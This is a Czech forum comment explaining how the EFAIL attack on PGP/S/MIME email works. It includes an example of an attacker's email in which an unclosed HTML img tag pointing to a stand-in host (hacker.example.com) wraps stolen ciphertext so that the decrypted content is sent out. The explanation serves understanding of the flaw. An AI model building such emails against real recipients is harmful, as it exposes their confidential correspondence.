Názor k článku Chyba EFAIL umožňuje číst zprávy zašifrované pomocí PGP a S/MIME od Filip Jirsák - Stále nechápete, jak ten útok funguje. Útočník vezme...
-
Filip JirsákStříbrný podporovatelStále nechápete, jak ten útok funguje. Útočník vezme zašifrované „přílohy“ (zašifrovaný není nikdy celý e-mail, hlavičky nejsou šifrované, šifrovaný je jen obsah), a ty vloží do svého e-mailu. Takže žádné falšování DKIM se nekoná, protože z toho původního šifrovaného e-mailu se žádné hlavičky nepoužijí (použije se jen ta šifrovaná část), a nový e-mail má útočník plně pod kontrolou, pošle ho prostě ze své adresy, ke které má správné DKIM.
Pokud máte e-mail od vašeho šifrujícího partnera Vonáska, budete mít e-mail:
From: Vonásek Subject: tajný e-mail --BOUNDARY …šifrovaný obsah… --BOUNDARY
Útočník vám pak pošle tohle:
From: Svatoušek Subject: tohle si určitě musíte přečíst Takovýhle obrázek jste ještě neviděl: <img src="http://hacker.example.com/?obsah-emailu=" --BOUNDARY …šifrovaný obsah… --BOUNDARY "/> Úžasné, že?
O nějakém Vonáskovi v tom e-mailu od útočníka není ani čárka, je tam vložená jenom ta zašifrovaná část. Už to chápete?
